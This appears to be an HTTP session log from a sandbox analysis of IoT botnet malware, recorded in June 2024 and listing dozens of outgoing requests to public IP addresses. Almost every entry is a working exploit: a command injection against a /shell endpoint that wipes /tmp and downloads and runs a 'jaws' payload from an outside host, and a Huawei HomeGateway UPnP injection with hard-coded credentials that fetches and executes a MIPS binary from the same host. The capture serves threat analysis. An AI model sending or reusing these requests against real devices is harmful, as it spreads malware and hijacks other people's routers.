                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.847522974 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            45192.168.2.1349620161.106.196.7080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.849795103 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            46192.168.2.1345994120.127.248.21580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.852063894 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            47192.168.2.134902280.246.211.21480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.854315996 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            48192.168.2.134356024.223.44.22580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.856618881 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            49192.168.2.1334410178.116.76.22080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.858870029 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            50192.168.2.135640076.87.100.6980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.860897064 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            51192.168.2.1343590200.227.24.11680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.862277985 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            52192.168.2.134323280.234.35.7780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.863642931 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            53192.168.2.133710886.248.77.22980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.864921093 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            54192.168.2.135201820.192.68.4380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.866128922 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            55192.168.2.134941264.204.248.7980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.867470026 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            56192.168.2.1342046195.209.166.10280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.868776083 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            57192.168.2.1356778124.198.230.5680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.869779110 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            58192.168.2.1339034152.83.224.20480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.871854067 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            59192.168.2.135273696.171.224.25580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.873251915 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            60192.168.2.1357824135.106.4.4980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.874567986 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            61192.168.2.1349110156.143.243.16637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.922411919 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            62192.168.2.136088241.1.16.24537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.923381090 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            63192.168.2.135532241.112.237.3437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.924273014 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            64192.168.2.1360470156.57.11.19737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.925133944 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            65192.168.2.1344436156.190.41.18337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.926043987 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            66192.168.2.133306441.251.69.19637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.927027941 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            67192.168.2.1341114156.18.195.16437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.927927017 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            68192.168.2.134568241.117.101.22437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.928827047 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
